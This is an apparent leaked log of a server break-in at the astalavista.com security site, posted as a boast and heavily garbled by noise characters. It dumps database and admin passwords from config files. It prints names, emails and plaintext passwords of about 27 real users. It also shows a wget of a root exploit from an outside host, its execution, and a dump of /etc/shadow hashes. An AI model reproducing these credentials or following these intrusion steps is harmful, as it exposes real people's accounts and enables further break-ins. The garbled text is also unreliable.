: [2 V9 j" K* T3 B! C( m4 |. `: M( Ndrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
3 E! {2 |; P7 y1 C# E0 y8 L& C8 Xdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql/ G8 _# C9 t( e3 I+ {
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com* G6 U# _; t3 @) c( g
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
/ M: B5 b% ?" Xdrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner3 [' f8 C( i8 s+ V9 Q3 z% R
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg% `! m% s: S) e( z' ^
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
3 w/ `& v( C( |( @1 X: D5 v: @drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron& w: x! r, Z* [6 s) [
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
7 [+ B* S1 t/ n6 |7 m-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
) g5 v9 r3 u: @ C-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
/ r- y8 O5 Y! @, Y3 J0 s1 Udrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
. C& v" p$ e! D/ N5 g( Ldrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
5 F% r ?: ^4 e; \' Y0 I: c J$ K-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
( q f* V! l$ y$ U$ s, }5 }-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
9 Z( g- P. d0 x: K" [-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
5 R6 `2 `6 X3 u% B' s-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html$ R2 N/ Z5 h4 i
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
: E h% i4 x* e# y# k) R4 x-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
7 s- N- h8 z2 [% R$ e* y" U, O5 r: V" z- Q* o-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf& O6 y4 `- } o4 o; s
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc/ d3 t7 I" R# [, {1 V
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang# x6 i7 n5 V% [
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib! r C; i! p: M9 z/ S
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log6 U( ]" v3 I5 J+ |: G7 [
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
/ G* C. X5 T9 w8 L* j% [6 Idrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata: s2 E: ~. F" x( a
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new6 W, G8 W* _* X; W
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
6 u4 c6 [# e. U% hdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re7 B& N2 I4 N* t4 Y% y _: ~2 w6 k
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt, c! O% ?1 ?% l2 m
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
N% r. v2 D! ]drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
9 f) {7 Y' \& m- y6 A& tdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com+ J; e+ u O1 \+ y0 V7 v) A @
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
& ? T) K: w) S2 K0 ~/ Xdrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
1 O9 T$ E" U9 l% C4 W. wdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
9 j! m$ O# I. O8 w+ [5 kdrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v26 D+ p' c% w8 W; j$ Z1 D0 d8 q- r
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
% g* \! @8 I5 ?! P-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
' I/ `8 n# i* Fdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki4 A% c0 a9 g( e0 b: q
: U' P' O: f Psh-3.2$ head -20 index.php0 F7 g" E: S8 v; L8 R; w9 ^
<?PHP+ b& k5 {: b" x) n W j; x
/**" M. J% i# D) r& P
* Mainfile (external) for astalavistaNET v2.0; K7 A& D+ l1 J* S2 M/ v: ~! Y
** }9 d# G% x' ]+ W8 i: i, j7 y
* @copyright Astalavista IT Engineering GmbH8 d, I6 ~- Y3 n0 `9 P4 v+ T
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>2 s6 Q: f- \7 M& ~ W2 g6 ?
* @version 1.06 d! x0 D1 N: T
*/$ t+ S, z2 ^2 G* J3 i* M
5 |* [* ?, Q1 L, N) ~4 k+ e% o! f
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {# A5 E7 C" Z* l: V, N' S3 i
$dontStartSession = false;
! d9 v+ ]. U- c9 q9 N& x0 X) z' Y } else {
S: x0 d9 A5 [3 P& l9 E $dontStartSession = true;
& K* k+ l" n% E/ s, n. {5 J8 y }& V7 s7 ~2 V+ |5 k
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);; ^3 x+ p; l; \4 X0 F
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
% A2 i% Q9 e+ }2 i/ D& t require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
2 Z4 L4 j! L# O require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
/ c+ x/ Z, x7 N9 M# l2 A
# Z9 S# U+ t7 N: u4 }; A. p+ F/ E i- msh-3.2$ cd config
5 S3 I! X& b7 k6 a% Zsh-3.2$ ls -la
* |' y0 a: x( z7 S& U: z7 Dtotal 32# c( ^1 }4 W% [& i0 g6 ]4 C# Z
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .6 U, K# c* c3 m+ {# k
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..- i. d! k1 X& c8 D% o
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php) H, g9 f# a. v
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
: w. O# C6 l* Q M4 ~. E5 v-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php9 O# f; o( @) Z" N1 T
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
$ c( B4 J+ }) E- z-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
" }9 }- j* e( }2 P8 ~
1 _- J* R7 \" ^' T6 [% p! r. T8 D. Hsh-3.2$ cat com.conf.php
- @/ u' s! a3 k. q2 P% v[snip]
( y f/ S1 Y9 i+ L2 I5 s//member-database* p, b% ^! L+ c/ g- }
$_CONFIG['db_mem_server'] = ‘localhost’;/ B- d' x7 a5 U
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;* a H1 Z- ]9 N1 o; v$ G7 T
$_CONFIG['db_mem_user'] = ‘astanet_db’;
: k% L1 h5 S" \2 M$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
v. O# C, a+ f' _6 C$_CONFIG['db_mem_debug'] = false; //true or false! F8 A) m/ y o* X8 r. o% c0 O
//ads-database5 y3 H5 O' Z. `7 a+ G+ F# w' x
$_CONFIG['db_ads_server'] = ‘localhost’;
o9 N3 d: k3 n* W$ X1 o* X5 E$_CONFIG['db_ads_database'] = ‘astanet_ads’;7 f3 L" w, P/ I1 I S; Z# h5 u4 o
$_CONFIG['db_ads_user'] = ‘astanet_db’;
* Z3 K3 L" R. o/ v. r. ]- o$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;6 H! R$ z8 V. l, k; Y" D3 _( b
$_CONFIG['db_ads_debug'] = false; //true or false
$ M/ S5 Z8 [; P/ `! B' ?7 h% H3 u//rainbow-database4 q, p2 m$ B& v- m% J
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
- r% L4 X8 ^& [# I0 i' |0 @* ?$_CONFIG['db_rainbow_database'] = ‘rainbow’;& R+ h. D' A9 g5 g9 W" C2 V: [# ?; d
$_CONFIG['db_rainbow_user'] = ‘dinu’;$ b/ W: p/ {0 U2 w4 V
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
5 b* \0 }0 D1 q$_CONFIG['db_rainbow_debug'] = false; //true or false9 m( @0 ^* D! U; G u
//mailing lists database& C3 o; Y2 w V8 `( R
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
0 D- W7 K. T+ L N7 ]# }5 a$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
@+ f j" B+ L$ D* N4 h$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
+ c. j2 q" ^7 i. i$ [) u$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
0 B% P4 E& S! b! R$_CONFIG['db_mailing_lists_debug'] = false; //true or false
5 f: B/ k) D1 V# p//paypal
. o% H: ]8 H* ~3 X! [7 K$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
# Z. y* m) v/ b5 \$_CONFIG['sub_pp_cmd'] = ‘_xclick’;# [ ~4 M5 ^# d8 j. T
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;# g# P) B! `+ {
$_CONFIG['sub_pp_noship'] = ‘1′;1 T& |& J i7 a, w) U
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
% \, N3 g. Q, I( j) h3 ]' H e5 T0 `& r' k[snip]
6 Q. F. J; k9 p* @ d( d. z
- S7 I5 o" f) F! C6 D' m7 Rsh-3.2$ cd ..
+ |2 b% b7 h' J- v" o$ ?! Bsh-3.2$ cd member
2 y3 {6 N$ W0 u( S3 R7 R9 Psh-3.2$ ls -la
! f7 o; H) L! E# {! Ctotal 20
8 O, K) q! s" Y8 cdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .$ M$ J9 ]4 V2 ?; d
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..$ [7 e2 Z; ~/ y$ c% x/ d
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess+ P" n! d9 m+ N z
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php* F; a G- X6 q6 g; L! ?* t, ^
sh-3.2$ cat .htaccess) r% x, r6 g9 ^) o; n% I" \' k
SecFilterEngine off
# X* }8 o% ^" K @2 u
& ~* z% u! y4 V& {sh-3.2$ cd ..# [7 F1 K6 I9 x2 W: g
sh-3.2$ cd cron: d0 b' U T$ _) x& W7 i; U' a- k
sh-3.2$ ls -la
7 f9 B( N1 E2 g: I$ ?3 |/ Z2 Ctotal 168' G& b2 k5 |$ |) B1 }8 `
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .% `" z9 Z' O, c! i4 i
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
! Z+ ]) x% F# n7 r% b) }( t-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php/ _- P8 r9 F3 m4 B* M% K1 E& C
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
( W3 H1 I- R! h7 m* \) U) \- H-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php/ M5 Y* ?; g- ^% G& P
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
" u* a/ \" S; K; N t8 ?-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php9 i- K+ a; x& {! p. {+ f7 s
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
/ f' {4 U. W3 C* c1 f( ^-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php8 n9 G2 G' b7 Q5 F8 q, @
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
, v6 @" G+ I7 o* q2 E1 ]9 n-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
5 J; O8 ~. w3 b/ V$ A k3 o-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
r" G$ Q/ B& ]" H m0 z# C-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php2 c4 }8 t0 _! h: C. F/ x- s) f2 ?
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php$ y' ` J* d7 l9 j0 o
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
7 O$ D: B! m; B% d% L! C-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php; v* c8 ~7 w" t5 \# M# H% ?" h. M% L
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
3 t5 f' \6 @0 H-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php' \ f# O% w( V! t6 b3 i8 [
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
: j; g$ F) K0 S: U) m U-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
) p9 o3 V$ ]5 \3 ?6 @drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email: z. E+ G7 H& B" Q2 G7 `, T
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php9 h' ~6 Z- j) ]7 F! P5 F
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php( |8 P, `, [0 B& c* c' r
2 A/ f$ H$ Q) l( f+ ish-3.2$ cd .. Q# m/ I: ?' d d- K: z# x8 W% |
sh-3.2$ cd _007
, G! P5 S- A& `6 Z8 I# m1 N# e: ssh-3.2$ ls -la
2 P8 w0 A1 T: Y. ltotal 24) N$ T+ u+ o" U( U2 \+ Z ~; r
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
* T5 R. i, ~" q7 f& m2 q+ c( O9 ^drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
3 {9 \; D ]6 q9 s' J ?1 \-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
! X! z: b) r3 }. ~8 W2 l- I& U-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
# X9 C5 Q- p) M-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php5 w# x% h; K) z- z( P6 l
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
, G( D9 ^7 a" X7 r7 J0 d
6 _) c. Z, r$ C1 }( }) ?" Z9 ^sh-3.2$ cat .htaccess
% [. K N1 a3 M; h4 _! E% i! jauthType Basic
* @ q% w% I$ \$ m. F* P' AauthName Admin4 ?; h' j& z- o
authUserFile /home/astanet/auth/.htadm_pwd6 r/ [3 A! c5 v% x4 S; p" Z
require valid-user+ r4 T- j. c5 s, q
! F; a. M8 z0 `9 ]
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
N3 L2 R/ z( n! {admin2net:CR0bl65MwhfT
% p# \% p8 M# o8 D- G; M
+ q! D% L6 F0 N1 Msh-3.2$ mysql -u astanet_db -p& w( i, z0 [% E
Enter password:
1 h/ Q9 V6 l. s# l! i4 q. fWelcome to the MySQL monitor. Commands end with ; or \g.
9 p1 e# I+ @2 A. {" }3 u. t# sYour MySQL connection id is 275153% b9 U3 k4 k4 [
Server version: 5.0.45-community-log MySQL Community Edition (GPL); B# \2 j, P' ? J/ N/ L
, N; Q7 z1 H0 [) M, K4 g+ NType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
% L H0 Y* W# x$ o# d6 j9 P) X' Q- {9 r1 ~
mysql> show databases;! h9 L; ]- n0 i
+———————–+& k- U1 v- C' a' K2 |: X
| Database |
8 N' D5 f$ U7 q" r2 ^" M+———————–+1 h3 ]# }6 J% z" A- c% T
| information_schema |
" P; s% r m# u, f4 Z: v| astanet_ads |1 {/ R7 m/ Y$ r q" F5 g0 Y
| astanet_mailing_lists |
' x* J( d3 ?6 s" J+ l; N, h| astanet_mediawiki |- H8 s7 ?0 m) s2 l' x/ n+ |
| astanet_membersystem |
- X' x7 x8 j# J, T| test |
) \; ~8 t4 T& c1 x+———————–+: C) ]1 [: Y. T" s: g& y" L
6 rows in set (0.00 sec)
2 Z: n( H' y3 x1 Q4 @
U% y. s, P# T9 I, ^& Tmysql> use astanet_membersystem/ h' y8 _, z* w) g, [
Database changed
6 Q# C) c# [$ |8 o9 umysql> show tables;
: B5 i9 z- p% m& ~5 B. U3 W+———————————–+
# w3 x- s4 m W* p& u! N; W9 ~| Tables_in_astanet_membersystem |
" R7 m0 \! r9 `% J( N" ]+———————————–+; C) P6 ]6 Z: h( `; K3 X: ?# D
| blacklist_categories |
' p, ~, k/ g; ]0 Y' h| blacklist_content |
+ b4 ^( x8 Y! Z, C5 Q| blacklist_levels |9 }, H/ N" e- r; g8 G
| blacklist_mcset |* Q0 t; ^7 b7 A; T& G) Q
| dir_categories |
6 P: ~9 D- t- s| dir_comments |5 }( ?% U8 O$ V5 Q' W1 a
| dir_links |. a9 X! n% w' J# C: |9 o
| dir_temp |& v3 X; l/ R. j8 t, |- {
| dir_votes |
6 Y* p9 ?- V" f, i| documents |
2 w4 t$ O& }# p2 _7 v6 @5 r1 G| documents_categories |
. ]$ _+ N! H6 D. T: |0 [| email_content |
, U$ t) R/ J, L5 ^. n| email_settings |
/ b- n9 Q: t+ S ?; ]| exploits |
; w6 W; n1 L1 C$ u| exploits_categories |9 G7 \% o+ w& M7 d w
| exploittree_categories |
8 e/ i N4 v, C# m7 i" a% c9 z2 u0 c| exploittree_exploits |
i/ j' I9 _* v| home_values |4 h9 g! F1 B) a: {
| iso_countries |
' {+ f' I, K" \9 ?$ h1 o| links_categories |
# T2 [; ^4 }4 Q| links_records |
/ I' L3 Z/ E/ X, w| links_unauth |* @7 ]; `) p |; S9 o( e6 M
| links_votes | e+ b" m1 j4 `2 j8 {
| log |
4 B* d* E0 o: m1 ^" S0 T y| news_categories |
. a4 C! A- |- N* A% X| news_comments |" d. h- _/ W+ w' X# M8 [- f
| news_emoticons | x0 m) D/ j4 i& a/ s' ?
| news_latest |$ M" k5 N9 H: q% {+ ?
| news_messages |& Y4 c( }& T' k
| news_statistics |% O* d* t0 a+ [* t1 ?+ _9 l
| news_votes |/ J4 n7 O+ J% [
| prices_content |$ X7 C; F2 O' b: T' @
| prices_offers |
2 R* B Y. k7 Q/ K8 O| rss_settings |/ x% H$ @0 W" [: r) }0 N
| sessions |6 P. D( a3 r) _- R3 @! c
| stats_signups |. z' l6 k0 Y* V& l1 Z/ U r$ f: ?0 [
| u2u2 |/ Z& s' X3 u6 |3 N* G/ R( l% a* N
| u2u_contact |
& P9 Y" k0 x5 ~3 V( S| u2u_settings |. t3 B9 {; Q9 D3 q
| user_keywords_selected_categories |9 o7 Y& b3 ^" a% A+ w) d
| users |
( ^& p9 W) [: w+ H d* z| users_ipn_test |' T! R. B- }1 N$ J* N, T
| users_keyword_values |0 }. A2 P! f7 S
| users_profile |& F7 q% \( S1 a% b+ [
| users_temp |, f9 I0 {6 {' I% J- F# R/ v
| users_upgrade |. d v2 O; [7 ]
+———————————–+
: p: F) g% b/ r0 A# z1 H& g1 c46 rows in set (0.00 sec)7 U) _, [( s+ f5 c
% b. V9 N2 }+ t& z4 W* vmysql> describe users;
$ B3 Y9 d8 C1 p' I% z( ]+————————–+————————————–+——+—–+———————+—————-+& a6 d1 P4 o( n% h8 S
| Field | Type | Null | Key | Default | Extra |
' p0 m; o4 E, Y6 S' u+————————–+————————————–+——+—–+———————+—————-+! E% j+ q$ E+ d% \2 `' D( K% A# q! G" F
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |+ W* R/ l" w" t* C
| user | varchar(50) | NO | | | |; b' h. b7 ~2 i) A9 }' Z# e
| nickname | varchar(30) | NO | MUL | anonymous | |
7 ?1 W5 E- ~" U| password | varchar(30) | NO | | | |
X; \( j* W( u+ d* M| userlevel | tinyint(3) | YES | MUL | NULL | |: ~% h- C" O `, Z+ l" Z- J
| exp | int(8) unsigned | NO | | 0 | |
' j1 w W8 W! S2 b| email | varchar(50) | NO | | | |
* V" [( r; X: l' c8 d| ip | varchar(15) | NO | | 0 | |
5 D# n8 `( T* v| proxy | set(’0′,’1′) | NO | | 0 | |
6 C3 y1 n8 F" q( C% s& X! y| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
* v* @; |8 u7 F7 u, T; n4 l| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
' L( A# f* d; C0 r1 m| anz_in | tinyint(1) | NO | | -1 | |
- O4 R$ P8 m) S| status | tinyint(1) unsigned | NO | | 0 | |: Y- c" Y) c. k6 r
| checked | set(’0′,’1′,’2′) | NO | | 0 | |6 @2 O! f( p) r
| freemember | set(’0′,’1′) | NO | | 0 | |6 P0 R5 r5 Q: @$ f& R
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
, v0 F# V, S$ q3 p0 w| lang | tinytext | NO | | | |
. }2 k F9 d- ]| adid | smallint(6) | NO | | 0 | |
; ?% A0 J# Y/ C0 f/ k1 @| pp_txn_id | varchar(255) | YES | | NULL | |: K9 m0 E9 b$ p+ [# D1 y
| cnb_transaction_id | varchar(255) | YES | | NULL | |% y9 f. [4 S& Z+ S! M
| cnb_order_id | varchar(255) | YES | | NULL | |$ r2 u; N- r# q) ^- ^ x
| cnb_user_id | int(11) | YES | | 0 | |2 {0 j& G$ d! q/ X2 {5 g
+————————–+————————————–+——+—–+———————+—————-+
: G2 N) Z- o4 s& {22 rows in set (0.01 sec)
8 W6 G+ I# H5 K3 V* x/ P( D$ T$ l" D2 [! v
mysql> select count(*) as skids from users;
$ l p5 b4 k$ I, u: m6 W+——-+
2 G/ }2 e+ W* V6 M ^| skids |
# |" i8 D9 Q4 D/ i7 e5 N- {' g0 N* x- J+——-+
% w: |; \; M: E T| 25199 |( ]0 ~4 c( w/ x5 y
+——-+
( T: [, M6 Q6 z1 row in set (0.00 sec)7 V& P$ f y+ e$ l. I3 v B
) K: s8 ], d- q8 ~9 z4 omysql> select user,nickname,password,email from users where userlevel = 1;4 J6 h% _* Y9 D. M& t
+————————–+———————-+——————+———————————–+
: [* _2 R$ r' M6 S+ K' h: ^| user | nickname | password | email |. `/ }' m+ q8 ?8 b7 y
+————————–+———————-+——————+———————————–+
$ r9 @' E0 P2 m0 Y| pascal | prozac | astaman3 | 链接标记info@astalavista.net |; ~ `# F) s7 c0 w" C, K1 f% z1 d k
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
: H F$ }" v5 Y0 Z& J| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
# |( m f# j9 ]( [ K% Z- m| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |& n* j" z+ T: E/ N% r
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |2 w- ?" t8 e. T: Q: P9 Y
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |7 _4 `+ R- V9 i" K" a2 I( D
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
1 o; W) h) B+ ~$ Q: z| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |0 k/ t5 Q# k, w
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |; P: C+ |( X! G4 @) u. W
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
, s4 z( N: ^& v6 H: s! y* M| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |. @& O: }0 g* ~
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |0 @* ?5 W* q0 Q* d3 b
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |5 s* t* d! S0 [" @
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |; K8 _: u, E* ?
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
5 V; }0 q0 G; s1 Z& l2 J$ m# g8 y| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
" @, ?# J) \, p, g3 P| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
9 s! m( z7 D$ U' r4 L, [6 O2 J. u| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |0 C( E* o% l6 o6 W. @" ~: [! X0 K
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
" y+ @- a/ r) y0 }| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |4 {& S" |; T3 U/ d% h2 g, A' W
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com | s4 P) A3 A( W1 l
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
, k; L: [! n5 G| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |5 ?5 _0 G8 N( q
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |" s; n3 q; Y2 J6 R
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |' U, Z6 O* K7 R) Z0 n
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |$ M5 G7 C0 ^: w- B/ w0 c+ J
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |8 e% m% X4 G% h* k
+————————–+———————-+——————+———————————–+
& K3 N& [, s) P: S27 rows in set (0.00 sec)# K4 X# d6 ] s
- @/ M/ X' v& S( k4 }mysql> exit;
# B9 L! L. t) o+ X( lBye+ z; r2 ?, g- F4 g* V
( M8 c; X) ~4 o+ J( k7 |. E[~] plaintext passwords? yes,' z& r, W9 u* C5 u1 k. }
Those so called “security professionals” who charge you $6.66 / month to
9 |1 ~6 s" `! W6 Z- ]register at their hack-proof portal, save your passwords in plaintext…
$ [( R% I" l$ ^3 Kbrilliant!
1 x- V6 s( ?) n1 X
# I; @; m* B+ @2 G6 `* k2 x[~] This been fun but we want more.; |) T" M! w1 ?8 Q# x7 k
$ d6 Z6 S% w" l6 q/ Osh-3.2$ uname -a! u/ x, l" ]- C) d9 g6 q, U
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
) {% R6 n% T" ?$ p- t" Y$ {sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
, x+ i7 b# {5 `) x- y- k* W; z–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
( I( T$ {6 P* EResolving anti.sec.labs… 13.33.33.37, R5 w8 z+ I/ y# ?/ G
Connecting to anti.sec.labs|13.33.33.37|:80… connected.
1 W1 C; a7 d+ rHTTP request sent, awaiting response… 200 OK ]5 }% r7 d+ B# Q
Length: 18200 (18K) [text/plain]
1 d* k! S- i& @Saving to: `g0troot’9 n! g6 L# [4 Q& p' t P% `
; Z" V) @& x; a6 u
100%[=========================================================================================================================================>] 18,200 58.6K/s in2 j* u Y; S. i' q) A* F7 h5 S2 F
0.3s
6 w$ Z" L0 f$ ^ u, x' x/ v
4 Y1 ^& P3 ?0 k2 ^( {" x18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
0 l$ B3 ?9 `# G) d1 ~2 E( L* T. l) }( M) k
sh-3.2$ ./g0troot -i x86_64
8 k: S9 V& G( S% ?[+] g0troot - anti.sec.labs3 f8 u" `( R' k5 C
[+] Target: 2.6.18-128.1.10.el54 ?5 a" R8 m! z4 D) F
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]* `; `9 x. ^. B
9 G! j( a6 e% s: ^: B; Y+ ^* ^: H3 g& H[+] r00tr00t
2 T( C! C3 i; D& A[~] Executing shell…. {/ `: q+ x- C; L4 b
0 D0 s' N, P. R
sh-3.2# id
+ L9 R4 A) o8 U/ v1 s* \) I8 c: ^uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
4 c3 _/ Q+ h3 `, ], J3 ~$ T: G$ A4 o6 V! b- e5 E
sh-3.2# cat /etc/shadow
9 I J- w6 C1 }4 P6 qroot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::4 Y) V% K: S0 ]9 J# E
[snip]2 ~) c* W m) O8 i% ^- K
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::' r) [ G3 `, V5 l: u) Y
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::( B2 m1 T% `3 x& o! V2 L- L
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::, ` S, a. B8 E# @
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
4 l; r" Q/ T: t9 ~4 y
2 f2 p E' \4 v; G" n7 |- dsh-3.2# cat /etc/motd
